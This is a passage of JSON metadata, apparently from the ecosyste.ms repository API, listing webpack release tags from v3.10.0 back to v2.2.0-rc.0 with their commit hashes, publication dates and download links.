sts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"